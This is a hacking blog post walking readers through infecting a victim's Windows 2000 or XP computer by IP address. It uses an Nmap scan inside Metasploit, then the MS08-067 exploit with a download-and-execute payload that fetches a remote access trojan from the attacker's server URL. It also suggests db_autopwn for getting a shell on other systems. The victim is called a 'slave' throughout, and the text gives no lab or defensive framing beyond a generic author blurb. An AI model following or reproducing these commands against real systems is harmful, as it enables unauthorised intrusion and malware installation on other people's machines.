Infecting Through IP Address

By Akshay   Posted at  7:22 PM   Hacking No comments



Requirements:
 

Nmap
Metasploit


First of all you need target ip of your slave.



Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]



Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]



Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on slav...e’s computer.]

Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slave’s computer.



Now it’s time to exploit slave’s machine.

Exploit depends on the OS, Ports, and Services running on slave’s computer.

So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.

No matter weather they’re protected by any firewall or not.



Now I’ll tell you exploiting:-



Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)



Type show exploits
[Use: This’ll show all the exploits in its database.]



Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]



Now Type show targets
[Use: This’ll show all targets by exploit]



Now Type set target 0

[Use: This’ll set target to 0 specified]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]



Then Type show options

[Use: This’ll show all options in the exploit & payload]

In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.



Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]



Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]



At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]



You can now control you're slave with RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case if you didn’t get this two OS’, immediately after Nmap scan

You can use the command db_autopwn –p –t –e.
In most cases you get a shell.


Source:http://insecure-stuff.blogspot.com

About the Author

Nulla sagittis convallis arcu. Sed sed nunc. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.
View all posts by: BT9

0 comments:

Back to top ↑
Connect with Us

What they says

Hi.Iam A 19 Years guy doing CEH & CHFI. I Like To Share My Ideas & Views About HACKING Because i Think That Everyone Should Know About It So That They Can Save Them Self From CRACKERS. "NO ONE CAN SAY AM A HACKER, WE ARE THE HACKERS" HACKING IS NOT CRIME IT's OWN PASSION. BUT ONE CAN USE OF IT FOR GOOD PURPOSE ALSO.
© 2013 AKSHAY. WP Mythemeshop Converted by BloggerTheme9
Blogger templates. | Distributed by Rocking Templates Proudly Powered by Blogger.